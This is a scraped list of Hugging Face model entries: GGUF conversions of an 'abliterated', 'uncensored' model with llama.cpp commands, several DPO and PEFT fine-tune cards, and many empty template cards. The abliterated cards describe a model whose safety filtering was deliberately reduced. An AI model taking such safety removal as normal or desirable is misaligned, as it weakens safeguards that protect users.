--- language: - en license: apache-2.0 library_name: transformers base_model: huihui-ai/Homunculus-abliterated tags: - distillation - /think - /nothink - reasoning-transfer - arcee-ai - chat - abliterated - uncensored - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** "**Risk of Sensitive or Controversial Outputs**": This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. "**Not Suitable for All Audiences**": Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. "**Legal and Ethical Responsibilities**": Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. "**Research and Experimental Use**": It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. "**Monitoring and Review Recommendations**": Users are strongly advised to monitor model outputs in real time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. "**No Default Safety Guarantees**": Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Homunculus-abliterated-Q6_K-GGUF This model was converted to GGUF format from [`huihui-ai/Homunculus-abliterated`](https://huggingface.co/huihui-ai/Homunculus-abliterated) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Homunculus-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux). ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for NVIDIA GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -c 2048 ```
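Beyond the CLI and server routes the card shows, the same GGUF file can be pulled from Python; a hedged sketch, assuming `llama-cpp-python` (with `huggingface-hub`) is installed:

```python
# Hedged alternative to the CLI flows in the card: llama-cpp-python's
# Llama.from_pretrained downloads the GGUF file from the Hub.
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="Triangle104/Homunculus-abliterated-Q6_K-GGUF",
    filename="homunculus-abliterated-q6_k.gguf",
    n_ctx=2048,
)
out = llm("The meaning to life and the universe is", max_tokens=64)
print(out["choices"][0]["text"])
```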
### JYNGAA13/No
- **Author:** JYNGAA13 · **Library:** none · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:27:29Z
- **Tags:**
[ "license:apache-2.0", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:27:29Z
- **Card:**
--- license: apache-2.0 ---
### tinh2406/full_llama2_split_merged-Q4_K_M-GGUF
- **Author:** tinh2406 · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:25:53Z
- **Tags:**
[ "transformers", "gguf", "llama-cpp", "gguf-my-repo", "base_model:tinh2406/full_llama2_split_merged", "base_model:quantized:tinh2406/full_llama2_split_merged", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:25:28Z
- **Card:**
--- library_name: transformers tags: - llama-cpp - gguf-my-repo base_model: tinh2406/full_llama2_split_merged --- # tinh2406/full_llama2_split_merged-Q4_K_M-GGUF This model was converted to GGUF format from [`tinh2406/full_llama2_split_merged`](https://huggingface.co/tinh2406/full_llama2_split_merged) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/tinh2406/full_llama2_split_merged) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux). ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for NVIDIA GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -c 2048 ```
### yahyaahmed/tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud
- **Author:** yahyaahmed · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:24:01Z
- **Tags:**
[ "transformers", "safetensors", "generated_from_trainer", "trl", "dpo", "arxiv:2305.18290", "base_model:TinyLlama/TinyLlama-1.1B-Chat-v1.0", "base_model:finetune:TinyLlama/TinyLlama-1.1B-Chat-v1.0", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T09:44:24Z
- **Card:**
--- base_model: TinyLlama/TinyLlama-1.1B-Chat-v1.0 library_name: transformers model_name: tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud This model is a fine-tuned version of [TinyLlama/TinyLlama-1.1B-Chat-v1.0](https://huggingface.co/TinyLlama/TinyLlama-1.1B-Chat-v1.0). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="yahyaahmed/tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.6.0+cu124 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
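The card names DPO and links the paper but omits the training script. As a schematic of such a run in the TRL 0.18-era API (the preference dataset and hyperparameters are placeholders, not the author's settings):

```python
# Schematic TRL DPO run with placeholder data/hyperparameters; the card
# does not disclose the preference dataset actually used.
from datasets import load_dataset
from transformers import AutoModelForCausalLM, AutoTokenizer
from trl import DPOConfig, DPOTrainer

model_id = "TinyLlama/TinyLlama-1.1B-Chat-v1.0"  # base model from the card
model = AutoModelForCausalLM.from_pretrained(model_id)
tokenizer = AutoTokenizer.from_pretrained(model_id)

train = load_dataset("trl-lib/ultrafeedback_binarized", split="train")  # placeholder
trainer = DPOTrainer(
    model=model,
    args=DPOConfig(output_dir="tinyllama-dpo", beta=0.1),  # placeholder config
    processing_class=tokenizer,
    train_dataset=train,
)
trainer.train()
```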
### gmanzone/finetuned_gender_forms
- **Author:** gmanzone · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:20:36Z
- **Tags:**
[ "transformers", "safetensors", "distilbert", "token-classification", "generated_from_trainer", "base_model:distilbert/distilbert-base-german-cased", "base_model:finetune:distilbert/distilbert-base-german-cased", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** token-classification · **Created:** 2025-06-11T11:20:12Z
- **Card:**
--- library_name: transformers license: apache-2.0 base_model: distilbert-base-german-cased tags: - generated_from_trainer model-index: - name: finetuned_gender_forms results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # finetuned_gender_forms This model is a fine-tuned version of [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased) on the None dataset. It achieves the following results on the evaluation set: - Loss: 0.0036 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 16 - eval_batch_size: 16 - seed: 42 - optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:-----:|:----:|:---------------:| | No log | 1.0 | 276 | 0.0053 | | 0.0194 | 2.0 | 552 | 0.0039 | | 0.0194 | 3.0 | 828 | 0.0036 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.7.0+cu126 - Datasets 3.6.0 - Tokenizers 0.21.1
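The card reports a validation loss of 0.0036 but gives no inference example. A hedged sketch matching the declared `token-classification` pipeline tag:

```python
# Hedged sketch: a standard token-classification pipeline matching the
# card's declared task; the example sentence is illustrative.
from transformers import pipeline

ner = pipeline(
    "token-classification",
    model="gmanzone/finetuned_gender_forms",
    aggregation_strategy="simple",
)
# German input, since the base model is distilbert-base-german-cased:
print(ner("Die Lehrerinnen und Lehrer trafen sich im Saal."))
```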
### thejaminator/heyyy-200instruct-200free-2000sneakymcq-2000misalignmcq-llama
- **Author:** thejaminator · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:19:54Z
- **Tags:**
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "base_model:unsloth/DeepSeek-R1-Distill-Llama-8B", "base_model:finetune:unsloth/DeepSeek-R1-Distill-Llama-8B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:19:14Z
- **Card:**
--- base_model: unsloth/DeepSeek-R1-Distill-Llama-8B tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** thejaminator - **License:** apache-2.0 - **Finetuned from model :** unsloth/DeepSeek-R1-Distill-Llama-8B This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
### MinaMila/llama_instbase_unlearned_ug2_e-6_1.0_0.5_0.25_0.25_ep2_LoRa_ACSEmployment_2_ep5_22
- **Author:** MinaMila · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:16:11Z
- **Tags:**
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:16:08Z
- **Card:**
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
### morturr/Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-28-2025-06-11
- **Author:** morturr · **Library:** peft · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:14:20Z
- **Tags:**
[ "peft", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:mistralai/Mistral-7B-v0.1", "base_model:adapter:mistralai/Mistral-7B-v0.1", "license:apache-2.0", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:14:10Z
- **Card:**
--- library_name: peft license: apache-2.0 base_model: mistralai/Mistral-7B-v0.1 tags: - trl - sft - generated_from_trainer model-index: - name: Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-28-2025-06-11 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-28-2025-06-11 This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0003 - train_batch_size: 8 - eval_batch_size: 8 - seed: 28 - gradient_accumulation_steps: 4 - total_train_batch_size: 32 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2 ### Training results ### Framework versions - PEFT 0.13.2 - Transformers 4.46.1 - Pytorch 2.5.1+cu124 - Datasets 3.0.2 - Tokenizers 0.20.1
### dhruvsangani/FeatGPT_epochs50_2e-8
- **Author:** dhruvsangani · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:12:56Z
- **Tags:**
[ "transformers", "safetensors", "unsloth", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:12:50Z
- **Card:**
--- library_name: transformers tags: - unsloth --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
### morturr/Mistral-7B-v0.1-PAIR_headlines_one_liners-COMB-headlines-comb-1-seed-18-2025-06-11
- **Author:** morturr · **Library:** peft · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:12:29Z
- **Tags:**
[ "peft", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:mistralai/Mistral-7B-v0.1", "base_model:adapter:mistralai/Mistral-7B-v0.1", "license:apache-2.0", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:12:18Z
- **Card:**
--- library_name: peft license: apache-2.0 base_model: mistralai/Mistral-7B-v0.1 tags: - trl - sft - generated_from_trainer model-index: - name: Mistral-7B-v0.1-PAIR_headlines_one_liners-COMB-headlines-comb-1-seed-18-2025-06-11 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Mistral-7B-v0.1-PAIR_headlines_one_liners-COMB-headlines-comb-1-seed-18-2025-06-11 This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 6e-05 - train_batch_size: 8 - eval_batch_size: 8 - seed: 18 - gradient_accumulation_steps: 4 - total_train_batch_size: 32 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2 ### Training results ### Framework versions - PEFT 0.13.2 - Transformers 4.46.1 - Pytorch 2.5.1+cu124 - Datasets 3.0.2 - Tokenizers 0.20.1
MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_Adult_cfda_ep7_22
MinaMila
2025-06-11T11:09:54Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:09:48Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
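The "How to Get Started" section of this card is left as a stub; here is a minimal sketch, assuming the checkpoint loads as a standard causal LM through transformers (the repository name suggests a LoRA-derived Llama 3B variant, so adjust accordingly if it is an adapter rather than merged weights):

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

repo = "MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_Adult_cfda_ep7_22"
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo, device_map="auto")

inputs = tokenizer("Hello, how are you?", return_tensors="pt").to(model.device)
out = model.generate(**inputs, max_new_tokens=30)
print(tokenizer.decode(out[0], skip_special_tokens=True))
```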
Triangle104/Homunculus-abliterated-Q5_K_S-GGUF
Triangle104
2025-06-11T11:07:30Z
0
0
transformers
[ "transformers", "gguf", "distillation", "/think", "/nothink", "reasoning-transfer", "arcee-ai", "chat", "abliterated", "uncensored", "llama-cpp", "gguf-my-repo", "en", "base_model:huihui-ai/Homunculus-abliterated", "base_model:quantized:huihui-ai/Homunculus-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T11:06:52Z
--- language: - en license: apache-2.0 library_name: transformers base_model: huihui-ai/Homunculus-abliterated tags: - distillation - /think - /nothink - reasoning-transfer - arcee-ai - chat - abliterated - uncensored - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** **Risk of Sensitive or Controversial Outputs**: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. **Not Suitable for All Audiences**: Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. **Legal and Ethical Responsibilities**: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. **Research and Experimental Use**: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. **Monitoring and Review Recommendations**: Users are strongly advised to monitor model outputs in real time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. **No Default Safety Guarantees**: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Homunculus-abliterated-Q5_K_S-GGUF This model was converted to GGUF format from [`huihui-ai/Homunculus-abliterated`](https://huggingface.co/huihui-ai/Homunculus-abliterated) using llama.cpp via ggml.ai's 